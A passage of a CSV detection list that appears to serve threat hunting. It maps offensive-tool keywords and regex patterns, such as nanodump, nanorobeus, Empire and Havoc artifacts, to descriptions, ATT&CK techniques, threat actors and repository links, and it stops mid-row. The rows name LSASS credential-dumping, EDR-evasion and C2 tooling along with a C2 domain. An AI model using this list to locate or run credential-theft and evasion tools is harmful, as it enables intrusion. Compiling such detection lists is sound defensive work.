WmEye*",".{0,1000}namespace\sWmEye.{0,1000}","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for Lateral Movement","T1047 - T1053.005 - T1124 - T1203 - T1569.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","8","4","365","59","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z","52625" "*nandydark/Linux-keylogger*",".{0,1000}nandydark\/Linux\-keylogger.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","#linux","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","52627" "*nanjmdknhkinifnkgdcggcfnhdaammmj*",".{0,1000}nanjmdknhkinifnkgdcggcfnhdaammmj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","52628" "*nanodump *",".{0,1000}nanodump\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52630" "*nanodump -*",".{0,1000}nanodump\s\-.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52631" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52632" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52633" "*nanodump.git*",".{0,1000}nanodump\.git.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52634" "*nanodump.x64*",".{0,1000}nanodump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52635" "*nanodump.x64.exe*",".{0,1000}nanodump\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52636" "*nanodump.x86*",".{0,1000}nanodump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52637" "*nanodump_dump*",".{0,1000}nanodump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52638" "*nanodump_pipe*",".{0,1000}nanodump_pipe.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","52639" "*nanodump_ppl.x64.dll*",".{0,1000}nanodump_ppl\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52640" "*nanodump_ppl_dump*",".{0,1000}nanodump_ppl_dump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52641" "*nanodump_ppl_dump.x64*",".{0,1000}nanodump_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52642" "*nanodump_ppl_dump.x86*",".{0,1000}nanodump_ppl_dump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52643" "*nanodump_ppl_medic*",".{0,1000}nanodump_ppl_medic.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52644" "*nanodump_ppl_medic.x64*",".{0,1000}nanodump_ppl_medic\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52645" "*nanodump_ppl_medic.x86*",".{0,1000}nanodump_ppl_medic\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52646" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52647" "*nanodump_ssp*",".{0,1000}nanodump_ssp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52648" "*nanodump_ssp.x64*",".{0,1000}nanodump_ssp\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52649" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52650" "*nanodump_ssp.x64.dll*",".{0,1000}nanodump_ssp\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52651" "*nanodump_ssp.x86*",".{0,1000}nanodump_ssp\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52652" "*nanodump_ssp_embedded.*",".{0,1000}nanodump_ssp_embedded\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","52653" "*NanoDumpChoose*",".{0,1000}NanoDumpChoose.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52654" "*nanodump-pipes*",".{0,1000}nanodump\-pipes.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","52655" "*NanoDumpPPLmedicPipe*",".{0,1000}NanoDumpPPLmedicPipe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52656" "*NanoDumpSSPPipe*",".{0,1000}NanoDumpSSPPipe.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process
explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","52657" "*NanoDumpWriteDump*",".{0,1000}NanoDumpWriteDump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","52658" "*nanorobeus*_cs.x64.*",".{0,1000}nanorobeus.{0,1000}_cs\.x64\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52659" "*nanorobeus*_cs.x86.*",".{0,1000}nanorobeus.{0,1000}_cs\.x86\..{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52660" "*nanorobeus*dump*",".{0,1000}nanorobeus.{0,1000}dump.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52661" "*nanorobeus.cna*",".{0,1000}nanorobeus\.cna.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 -
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52662" "*nanorobeus.py*",".{0,1000}nanorobeus\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","52663" "*nanorobeus.x64*",".{0,1000}nanorobeus\.x64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52664" "*nanorobeus.x64.*",".{0,1000}nanorobeus\.x64\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52665" "*nanorobeus.x86*",".{0,1000}nanorobeus\.x86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52666" "*nanorobeus_brc4*",".{0,1000}nanorobeus_brc4.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52667" "*nanorobeus64*",".{0,1000}nanorobeus64.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52668" "*nanorobeus86*",".{0,1000}nanorobeus86.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52669" "*nanorobeus-main*",".{0,1000}nanorobeus\-main.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","52670" "*nanorubeus.*",".{0,1000}nanorubeus\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","52671" "*Narasimha1997/fake-sms*",".{0,1000}Narasimha1997\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","N/A","8","10","2745","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z","52672" "*Nasir Khan (r0ot h3x49)*",".{0,1000}Nasir\sKhan\s\(r0ot\sh3x49\).{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","52673" "*nasm -f win64 ./syscalls.asm -o ./syscalls.obj*",".{0,1000}nasm\s\-f\swin64\s\.\/syscalls\.asm\s\-o\s\.\/syscalls\.obj.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","0","#linux","N/A","10","","N/A","","","","52674" 
"*NativeBypassCredGuard.exe*",".{0,1000}NativeBypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","52675" "*NativeDump.exe *.dmp*",".{0,1000}NativeDump\.exe\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","52676" "*NativeEasyHook32.dll*",".{0,1000}NativeEasyHook32\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","52677" "*NativeEasyHook64.dll*",".{0,1000}NativeEasyHook64\.dll.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","52678" "*Naughty-Script.ps1*",".{0,1000}Naughty\-Script\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","52679" "*nbdytundtyud5dey.azurewebsites.net*",".{0,1000}nbdytundtyud5dey\.azurewebsites\.net.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","52681" "*NBNSBruteForceHost*",".{0,1000}NBNSBruteForceHost.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52682" "*NBNSBruteForcePause*",".{0,1000}NBNSBruteForcePause.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52683" "*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52684" "*NBNSBruteForceSpoofer*",".{0,1000}NBNSBruteForceSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
